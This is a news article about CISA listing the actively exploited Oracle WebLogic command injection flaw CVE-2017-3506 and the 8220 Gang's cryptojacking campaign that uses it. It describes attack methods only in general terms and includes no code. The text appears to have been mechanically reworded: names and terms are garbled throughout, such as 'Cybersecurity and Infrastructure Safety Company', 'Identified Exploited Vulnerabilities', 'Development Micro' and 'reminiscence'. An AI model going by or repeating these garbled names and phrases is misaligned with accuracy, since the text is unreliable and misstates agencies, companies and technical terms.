The U.S. Cybersecurity and Infrastructure Safety Company (CISA) on Thursday added a security flaw impacting the Oracle WebLogic Server to the Identified Exploited Vulnerabilities (KEV) catalog, citing proof of lively exploitation.
Tracked as CVE-2017-3506 (CVSS rating: 7.4), the difficulty considerations an working system (OS) command injection vulnerability that may very well be exploited to acquire unauthorized entry to prone servers and take full management.
“Oracle WebLogic Server, a product throughout the Fusion Middleware suite, comprises an OS command injection vulnerability that permits an attacker to execute arbitrary code through a specifically crafted HTTP request that features a malicious XML doc,” CISA mentioned.
Whereas the company didn’t disclose the character of assaults exploiting the vulnerability, the China-based cryptojacking group often called the 8220 Gang (aka Water Sigbin) has a historical past of leveraging it since early final 12 months to co-opt unpatched gadgets right into a crypto-mining botnet.
In response to a current report printed by Development Micro, the 8220 Gang has been noticed weaponizing flaws within the Oracle WebLogic server (CVE-2017-3506 and CVE-2023-21839) to launch a cryptocurrency miner filelessly in reminiscence via a shell or PowerShell script relying on the working system focused.
“The gang employed obfuscation strategies, akin to hexadecimal encoding of URLs and utilizing HTTP over port 443, permitting for stealthy payload supply,” security researcher Sunil Bharti mentioned. “The PowerShell script and the ensuing batch file concerned complicated encoding, utilizing surroundings variables to cover malicious code inside seemingly benign script elements.”
In gentle of the lively exploitation of CVE-2017-3506, federal businesses are beneficial to use the newest fixes by June 24, 2024, to guard their networks towards potential threats.